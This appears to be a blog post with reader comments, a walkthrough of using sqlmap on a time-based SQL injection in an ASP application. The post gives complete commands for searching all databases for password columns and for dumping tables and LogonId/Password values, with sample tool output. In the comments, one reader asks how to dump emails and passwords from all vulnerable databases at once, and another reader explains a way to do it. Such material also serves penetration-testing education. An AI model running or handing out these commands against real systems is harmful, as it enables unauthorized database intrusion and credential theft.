To search all databases for 'password'
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -C 'password'
To search a specific database for 'password'python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -D 'MYDATABASE' -C 'password'
**note, that once sqlmap was done with 'MYDATABASE' it checked the rest of the DBs**
[15:28:17] [INFO] fetching columns LIKE 'password' for table 'dbo.mytable' on database 'MYDATABASE'
You'll get asked:do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
You'll want to give it a 1 first time around, it will probably give you stuff like this:[15:27:38] [INFO] retrieved: 2
[15:28:22] [INFO] retrieved: Password
[15:29:18] [INFO] retrieved: PrintPasswords
We now know that we want to go back and enumerate/dump the column values from dbo.mytable and database MYDATABASE to see if there is anything good there. Mostly likely there is also a userID or LogonId in there we need to extract as well.python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --columns -T dbo.mytable -D MYDATABASE --time-sec=1
You could also just do a dump if you want to start grabbing datapython sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1
If you just want to pull a certain number of rows, you can also give a --start and --stop switch (--start=1 --stop=10) <--sometimes works, sometimes doesnt. Not sure whats up with that.python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10
If you just want to just pull out certain columns you can do something like this (assuming columns LogonId and Password):python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -C LogonId,Password -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10
I'm sure I just committed some SQLMap sins, so please correct me (like last time) :-)-CG
SQLMap is for the oldies. :-)
ReplyDeleteTest this and then tell me what you think.
http://themole.nasel.com.ar/
c ya!
Is there way to just dump mails and passwords from all vulneable databases at once? Thanks
ReplyDeleteif you know what table the data is in you can just craft a command to pull the user/pass without pulling the rest. you can do this via --sql-query=QUERY SQL statement to be executed option
ReplyDeleteDo i have to load data to the columns or am i missing somthing? Everytime i dump the columns the value is NULL i cant seam to figure this out please some advice would be nice.
ReplyDeletewhat does the rowcount say for that table? are you sure there is data there? The type of injection you are working with also matters and might be contributing to the weird values returned.
ReplyDeletedoes the results of:
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
return data?
Also this post is super old. no guarantee this still works at all (although reading over it...it should)